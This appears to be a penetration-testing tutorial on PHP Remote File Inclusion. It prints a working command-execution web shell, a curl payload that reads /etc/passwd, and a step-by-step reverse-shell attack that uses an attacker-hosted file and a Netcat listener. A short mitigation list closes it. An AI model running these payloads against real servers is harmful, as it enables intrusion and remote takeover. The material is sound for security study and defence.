Remote File Inclusion (RFI)

Published on March 13, 2025

Remote File Inclusion (RFI) vulnerabilities are less common than Local File Inclusion (LFI) because they require specific configurations. In PHP, for example, the allow_url_include option must be enabled, which is disabled by default in current PHP versions. Unlike LFI, which allows including local files, RFI enables loading files from a remote system via HTTP or SMB. If exploited, the included file executes in the web application's context.

1. Exploiting RFI with Web Shells

Attackers often use RFI to include a webshell—a small script that provides a command-line interface via a web page. Kali Linux includes several PHP webshells in /usr/share/webshells/php/. Below is an example using simple-backdoor.php: 

<?php
        if(isset($_REQUEST['cmd'])){
            echo "<pre>";
            $cmd = ($_REQUEST['cmd']);
            system($cmd);
            echo "</pre>";
            die;
        }
?>

To use this shell, an attacker hosts it on their system and includes it in a vulnerable web page: 

http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

2. Hosting a Malicious File

For RFI to work, the malicious file must be remotely accessible. One method is using Python's built-in web server: 

kali@kali:/usr/share/webshells/php$ python3 -m http.server 80

With the file now accessible, we can force its inclusion via the vulnerable web application: 

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

This confirms successful inclusion, listing remote directory contents. Attackers can then escalate by spawning a reverse shell with Netcat.

3. Going Further : Inject a Reverse Shell

You have to host a web server with a reachable php reverse shell. Here it's the pentestmonkey one (php-reverse-shell.php): 

kali@kali:/usr/share/webshells/php$ python3 -m http.server 80

Modify the php-reverse-shell.php file with your web server IP and a listening port like 4444.

Listen on port 4444 with Netcat: 

nc -nlvp 4444

Exploit RFI with your listening web server: 

curl http://192.168.211.16/meteor/index.php?page=http://192.168.45.183/php-reverse-shell.php

Improve the shell: 

script /dev/null -c bash

4. Mitigating RFI Vulnerabilities

To protect against RFI attacks, web developers should:

  • Disable allow_url_include in php.ini.
  • Use whitelisting for file inclusion.
  • Sanitize and validate user input.
  • Monitor logs for unusual URL patterns.

Related Topics